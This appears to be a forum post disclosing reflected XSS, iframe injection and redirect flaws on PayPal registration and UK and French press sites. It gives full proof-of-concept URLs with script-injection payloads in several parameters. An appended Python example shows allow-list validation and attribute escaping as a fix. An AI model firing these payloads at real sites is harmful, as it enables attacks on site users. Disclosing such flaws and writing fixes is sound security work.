


PayPal again vulnerable to XSS



Paypal.com

registration.paypal.com is vulnerable to XSS, iframe injection and redirect.

Vulnerable page:

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country=


PoC:

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country="><script>alert(String.fromCharCode(88,83,83))</script>

Then click Continue.


http://img9.imageshack.us/img9/3801/89855532.jpg

http://img9.imageshack.us/img9/8461/54961825.jpg

http://img9.imageshack.us/img9/1530/28942901.jpg

Proof of concept video demonstration

http://www.youtube.com/watch?v=wRYGFomNtz4


PayPal UK MediaCenter - XSS, iframe injection and redirect

Iframe and redirect on the search module.
http://img239.imageshack.us/img239/1594/26271935.jpg  

XSS

Code:
https://www.paypal-press.co.uk/content/default.asp?NewsAreaID=2&LocaleID='"></title><script>alert(Methodman)</script>><marquee><h1>XSS</h1></marquee>


Code:
https://www.paypal-press.co.uk/imagelibrary/detail.asp?MediaDetailsID="'/><script>alert(String.fromCharCode(88,83,83))</script>



The same problem also exists on https://www.paypal-press.fr
http://img168.imageshack.us/img168/7154/78264670.jpg

PayPal staff have been alerted about this.
Warning! This is only a proof of concept, so we will not be responsible for any damage.


Submitted by [-TE-]-Methodman
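
The fix for this bug class, as an added example that is not part of the original post and is not PayPal's code: validate each reflected parameter against an allow-list and encode it for the HTML attribute context before output. Assumptions: the value is reflected into a double-quoted attribute (suggested by the `">` prefix in the PoC), the parameter formats in `RULES`, the placeholder host `example.test`, and all function names.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Assumed formats (the page does not state them): a two-letter country code
# and numeric IDs for the two press-site parameters.
RULES = {
    "country": re.compile(r"[A-Za-z]{2}"),
    "LocaleID": re.compile(r"[0-9]{1,6}"),
    "MediaDetailsID": re.compile(r"[0-9]{1,9}"),
}

# Constructed requests: placeholder host, query strings as quoted in the post.
POC_COUNTRY = ('https://example.test/welcomePage.do?partner=PayPalUK&bundleCode=C3'
               '&country="><script>alert(String.fromCharCode(88,83,83))</script>')
POC_MEDIA = ('https://example.test/imagelibrary/detail.asp'
             '?MediaDetailsID="\'/><script>alert(String.fromCharCode(88,83,83))</script>')


def raw_param(url, name):
    """Return the parameter exactly as the client sent it (empty if absent)."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])
    return values[0] if values else ""


def clean_param(url, name, default=""):
    """Return the parameter only if it is sent once and fully matches its rule."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])
    if len(values) == 1 and RULES[name].fullmatch(values[0]):
        return values[0]
    return default


def render_unsafe(value):
    """The bug class: raw concatenation into a double-quoted attribute."""
    return '<input type="hidden" name="country" value="' + value + '">'


def render_safe(value):
    """Encode for the attribute context; quote=True escapes both quote characters."""
    return ('<input type="hidden" name="country" value="'
            + html.escape(value, quote=True) + '">')


if __name__ == "__main__":
    payload = raw_param(POC_COUNTRY, "country")
    print(render_unsafe(payload))   # markup breaks out of the attribute
    print(render_safe(payload))     # same input stays inside value="..."
    print(repr(clean_param(POC_COUNTRY, "country")))  # rejected by the allow-list
```

Validation and encoding are both applied on purpose: the allow-list rejects malformed input early, and the encoder still protects any field whose format cannot be restricted that tightly.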

